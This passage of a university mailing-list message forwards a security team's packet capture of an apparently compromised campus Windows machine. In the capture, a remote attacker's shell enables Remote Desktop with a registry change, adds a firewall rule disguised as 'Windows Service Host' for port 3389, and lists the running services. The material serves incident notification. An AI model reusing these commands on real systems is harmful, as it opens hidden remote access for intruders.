>> Link-local IPv6 Address . . . . . : fe80::c9a9:464b:1f35:e7b3%17.
>> IPv4 Address. . . . . . . . . . . : 10.37.131.2.
>> Subnet Mask . . . . . . . . . . . : 255.255.255.0.
>> Default Gateway . . . . . . . . . : .
>> .
>> Tunnel adapter isatap.cs.ucsb.edu:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : cs.ucsb.edu.
>> .
>> Tunnel adapter isatap.{49BB9C41-C060-433B-BF91-9F104E841F11}:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : .
>> .
>> Tunnel adapter Local Area Connection* 11:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-spec
>> 
>> T 2017/01/18 02:46:19.304089 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> ific DNS Suffix . : .
>> 
>> 
>> T 2017/01/18 02:46:19.500202 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:19.500764 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Tunnel adapter isatap.{EB59D303-0C84-4EF4-842B-01A57D775715}:.
>> .
>> Media State . . . . . . . . . . . : Media disconnected.
>> Connection-specific DNS Suffix . : .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>> 
>> T 2017/01/18 02:46:19.696722 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:44.733187 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> reg.exe ADD
>> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>> 
>> 
>> T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> reg.exe ADD
>> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
>> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>> 
>> 
>> T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> The operation completed successfully...
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>> 
>> T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> netsh advfirewall firewall add rule name = "Windows Service Host"
>> dir=in action=allow protocol=TCP localport=3389
>> 
>> 
>> T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> netsh advfirewall firewall add rule name = "Windows Service Host"
>> dir=in action=allow protocol=TCP localport=3389
>> 
>> 
>> T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> Ok..
>> .
>> 
>> T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>> 
>> T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [AP]
>> net start
>> 
>> 
>> T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> net start
>> 
>> 
>> T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> These Windows services are started:.
>> 
>> 
>> T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [A]
>> .
>> Adobe Acrobat Update Service.
>> AMD External Events Utility.
>> Apple Mobile Device.
>> Application Experience.
>> Application Information.
>> Background Intelligent Transfer Service.
>> Base Filtering Engine.
>> Bonjour Service.
>> Certificate Propagation.
>> COM+ Event System.
>> Computer Browser.
>> Credential Manager.
>> Cryptographic Services.
>> DCOM Server Process Launcher.
>> Desktop Window Manager Session Manager.
>> DHCP Client.
>> Diagnostic Policy Service.
>> Diagnostic Service Host.
>> Diagnostics Tracking Service.
>> Distributed Link Tracking Client.
>> DNS Client.
>> Function Discovery Provider Host.
>> Function Discovery Resource Publication.
>> Group Policy Client.
>> Human Interface Device Access.
>> IKE and AuthIP IPsec Keying Modules.
>> IP Helper.
>> iPod Service.
>> IPsec Policy Agent.
>> LMIGuardianSvc.
>> LogMeIn.
>> LogMeIn Maintenance Service.
>> Microsoft Antimalware Service.
>> Microsoft Network Inspection.
>> Microsoft Office Click-to-Run Service.
>> MT7 Registry Service.
>> MT7 Serial Search Service.
>> MySQL55.
>> Network Connections.
>> Network List Service.
>> Network Location Awareness.
>> Network Store Interface Service.
>> Office Software Protection Platform.
>> Offline Files.
>> Parallels Networking Service.
>> Parallels Virtualization Service.
>> Plug and Play.
>> Pml Driver HPZ12.
>> PnP-X IP Bus Enumerator.
>> Portable Device Enumerator Service.
>> Power.
>> Print Spooler.
>> Program Compati
>> 
>> T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> bility Assistant Service
>> 
>> T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
>> 128.111.28.118:20138 [A]
>> ......
>> 
>> T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
>> 188.132.176.26:4000 [AP]
>> .
>> Quality Windows Audio Video Experience.
>> Remote Access Connection Manager.
>> Remote Desktop Configuration.
>> Remote Desktop Services.
>> Remote Desktop Services UserMode Port Redirector.
>> Remote Procedure Call (RPC).
>> Routing and Remote Access.
>> RPC Endpoint Mapper.
>> Secondary Logon.
>> Secure Socket Tunneling Protocol Service.
>> Security Accounts Manager.
>> Security Center.
>> Server.
>> Shell Hardware Detection.
>> Skype C2C Service.
>> SQL Server (SQLEXPRESS).
>> SQL Server VSS Writer.
>> SSDP Discovery.
>> Superfetch.
>> System Event Notification Service.
>> Tablet PC Input Service.
>> TabletServicePen.
>> Task Scheduler.
>> TCP/IP NetBIOS Helper.
>> TeamViewer 11.
>> Telephony.
>> Themes.
>> UPnP Device Host.
>> User Profile Service.
>> Wacom Consumer Touch Service.
>> Windows App Certification Kit Fast User Switching Utility Service.
>> Windows Audio.
>> Windows Audio Endpoint Builder.
>> Windows Driver Foundation - User-mode Driver Framework.
>> Windows Event Log.
>> Windows Firewall.
>> Windows Font Cache Service.
>> Windows Image Acquisition (WIA).
>> Windows Management Instrumentation.
>> Windows Media Player Network Sharing Service.
>> Windows Presentation Foundation Font Cache 3.0.0.0.
>> Windows Search.
>> Windows Update.
>> WinHTTP Web Proxy Auto-Discovery Service.
>> Workstation.
>> .
>> The command completed successfully..
>> .
>> .
>> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>> 
>> ----------sample----------
>> --
>> E. Todd Atkins
>> Enterprise Technology Services
>> University of California, Santa Barbara http://www.security.ucsb.edu/
>> 
>> **********************************************************************
>> The NOC's list of network contacts is used to determine who should 
>> receive email such as this. Please direct any requests for changes to 
>> this list of network contacts to noc at ucsb.edu.
>> **********************************************************************
>> 
> 
> 
> --
> 
> Scott Kasai
> User Support Specialist
> Engineering Computing Infrastructure
> University of California, Santa Barbara
> 
> 
> 
> 
> _______________________________________________
> Ilab-users mailing list
> Ilab-users at lists.cs.ucsb.edu
> https://lists.cs.ucsb.edu/mailman/listinfo/ilab-users

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.cs.ucsb.edu/pipermail/ilab-users/attachments/20170119/8fe17e39/attachment-0001.html>

More information about the Ilab-users mailing list